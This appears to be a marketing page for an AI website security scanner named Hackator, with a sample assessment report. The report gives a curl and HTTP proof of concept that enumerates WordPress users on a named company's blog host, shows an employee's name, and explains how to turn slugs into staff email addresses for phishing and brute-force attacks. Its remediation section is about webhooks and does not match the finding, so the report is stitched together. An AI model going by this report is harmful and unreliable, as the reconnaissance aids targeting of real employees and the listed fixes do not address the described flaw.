Simple as 1-2-3

How Hackator works

Three simple steps to secure your website with AI. Submit, AI analyzes, get your report.

Step 01

Submit your URL

Enter the website URL you want to test. Our AI-powered platform accepts any publicly accessible website — no setup or configuration required. Just paste your URL and hit scan.

No installation needed
Works with any public website
hackator.com/dashboard
Submit a new scan
https://example.com
My company website
Submitted
vulnerability-scanner
100%
Analysis Complete
SSL/TLS Certificate
Valid until 2027-01-15
HTTP Security Headers
Missing X-Frame-Options
XSS Vulnerability Scan
Reflected XSS in /search?q=
SQL Injection Tests
No injection points found
CSRF Token Validation
Tokens properly implemented
Open Ports Scan
Port 8080 exposed
Directory Traversal
No traversal paths found
Outdated Dependencies
jQuery 2.1.4 — known CVEs
2 Critical
2 Warnings
4 Secure
Step 02

AI analyzes your vulnerabilities

Our AI engine and security experts perform a thorough vulnerability assessment. We check for XSS, SQL injection, misconfigurations, outdated dependencies, and more using advanced AI analysis.

OWASP Top 10 coverage
Manual + automated testing
Step 03

Get your security report

Download a detailed AI-generated PDF report with findings, severity levels, proof of concept, and smart remediation guidance. Access it from your dashboard anytime.

Downloadable PDF report
Available on your dashboard
Delivered in less than 24h
hackator-report-HKT-2026-0847.pdf
7/7 sections
Hackator Logo

HACKATOR

Security Assessment Report

Report ID: HKT-2026-0847
Date: March 11, 2026
MEDIUM 5.7CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary

The WordPress REST API endpoint /wp-json/wp/v2/users on blog.pub.us-west-2.prd.23andme.us returns a list of WordPress users including their IDs, display names, and email-derived slugs without requiring authentication.

Description

The WordPress REST API /wp-json/wp/v2/users endpoint is accessible without authentication on the internal backend. It returns user objects containing user IDs, display names, and URL slugs. The slugs are derived from internal email addresses (e.g., alehman23andme-com → [email protected]), directly exposing employee email addresses.

Steps To Reproduce
1.

Send a GET request to: curl -s https://blog.pub.../wp-json/wp/v2/users

2.

Observe the JSON response containing user data

3.

Extract email addresses from the slug field by reversing the slug encoding

Proof of Concept
GET /wp-json/wp/v2/users HTTP/1.1
Host: blog.pub.us-west-2.prd.23andme.us

Response: HTTP/1.1 200 OK
[{
  "id": 10,
  "name": "Alisa Lehman",
  "slug": "alehman23andme-com"
}, ...]

Derived email addresses:

[email protected][email protected]
Impact

Attackers can enumerate all WordPress user accounts and their IDs, extract internal employee email addresses for phishing campaigns, and use discovered usernames for targeted brute-force or credential stuffing attacks against wp-login.php.

Recommended Fix

Implement authentication (API key or HMAC signature) on all webhook endpoints

Implement rate limiting and CAPTCHA to prevent spam abuse

Remove webhook URLs from public JavaScript bundles; use server-side proxies

Implement webhook secret validation (HMAC-SHA256 signature)

Audit all workflows triggered by public webhooks

Report complete — 1 vulnerability found
Start protecting your website

Ready to find vulnerabilities?

Submit your URL now and get a comprehensive AI-powered security report delivered to your inbox in less than 24 hours.